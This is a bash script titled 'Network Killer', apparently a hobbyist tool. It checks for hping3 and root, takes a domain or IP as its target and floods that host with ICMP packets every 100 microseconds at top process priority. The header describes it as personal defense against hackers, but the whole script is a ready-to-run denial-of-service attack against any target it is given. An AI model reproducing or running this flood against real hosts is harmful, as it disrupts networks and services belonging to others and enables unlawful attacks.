#!/bin/bash

###########################################################################################################################
#                                                                                                                         #
# Network Killer, for system's personal defense against hackers.                                                          #
# By: archnon@protonmail.com, btw                                                                                         #
# Based in: bash                                                                                                          #
# Requires: bash, hping, sudo                                                                                             #
#                                                                                                                         #
###########################################################################################################################

###############################################################
# Copyright (c) 2026 archnon@protonmail. All Rights Reserved. #
###############################################################

############## colors ##################

RED="\e[1;31m"
GREEN="\e[1;32m"
BLUE="\e[1;34m"
P="\e[1;35m"
YELLOW="\e[1;33m"
ORANGE="\e[38;5;214m"
LB="\e[1;36m"
WHITE="\e[1;37m"
NC="\e[0m"

################################# banner ##################################

echo -e "${RED} ███▄    █  ██ ▄█▀ ██▓ ██▓     ██▓       "
echo -e "${RED} ██ ▀█   █  ██▄█▒ ▓██▒▓██▒    ▓██▒       "
echo -e "${RED}▓██  ▀█ ██▒▓███▄░ ▒██▒▒██░    ▒██░       "
echo -e "${RED}▓██▒  ▐▌██▒▓██ █▄ ░██░▒██░    ▒██░       "
echo -e "${RED}▒██░   ▓██░▒██▒ █▄░██░░██████▒░██████▒   "
echo -e "${RED}░ ▒░   ▒ ▒ ▒ ▒▒ ▓▒░▓  ░ ▒░▓  ░░ ▒░▓  ░   "
echo -e "${RED}░ ░░   ░ ▒░░ ░▒ ▒░ ▒ ░░ ░ ▒  ░░ ░ ▒  ░   "
echo -e "${RED}   ░   ░ ░ ░ ░░ ░  ▒ ░  ░ ░     ░ ░      "
echo -e "${RED}         ░ ░  ░    ░      ░  ░    ░  ░   "
echo -e "${RED}                                         "

echo -e "${RED}╔════════════════╗
║ ${GREEN}Network Killer${RED} ║
╚════════════════╝${NC}"
echo -e "${WHITE}𝙳𝚎𝚟𝚎𝚕𝚘𝚙𝚎𝚍 𝚋𝚢:${P} 𝚊𝚛𝚌𝚑𝚗𝚘𝚗@𝚙𝚛𝚘𝚝𝚘𝚗𝚖𝚊𝚒𝚕.𝚌𝚘𝚖${NC}"

##################### dependencies ###########################

if ! (command -v hping3 >/dev/null 2>&1); then
  echo -e "\n${RED}[${WHITE}X${RED}] Install: ${ORANGE}hping${NC}"
  exit 1
fi

if ! (command -v sudo >/dev/null 2>&1); then
  echo -e "\n${RED}[${WHITE}X${RED}] Install: ${ORANGE}sudo${NC}"
  exit 1
fi

if [ $EUID -ne 0 ]; then
  echo -e "\n${RED}[${WHITE}X${RED}] Run as root${NC}"
  exit 1
fi

target=$1

if [ -z $target ]; then
  echo -e "\n${RED}[${WHITE}X${RED}] Missing target, ${P}ex${WHITE}: ${ORANGE}domain, ip.${NC}"
  echo -e "\n${RED}[${YELLOW}warn${RED}]${ORANGE} usage: ${P}$0 ${YELLOW}<${BLUE}target${YELLOW}>${NC}"
  exit 1
fi

echo -e "\n${BLUE}[${LB}OK${BLUE}]${P} Killing: ${ORANGE}$target${NC}"

sudo nice -n -20 sudo hping3 -S --icmp -V -i u100 --beep --force-icmp -k -w 9999999999999999999999999999999999 $target && echo -e "\n${BLUE}[${LB}OK${BLUE}]${P} Killed: ${ORANGE}$target ${NC}" || echo -e "\n${RED}[${WHITE}X${RED}] Something was not okay..${NC}"
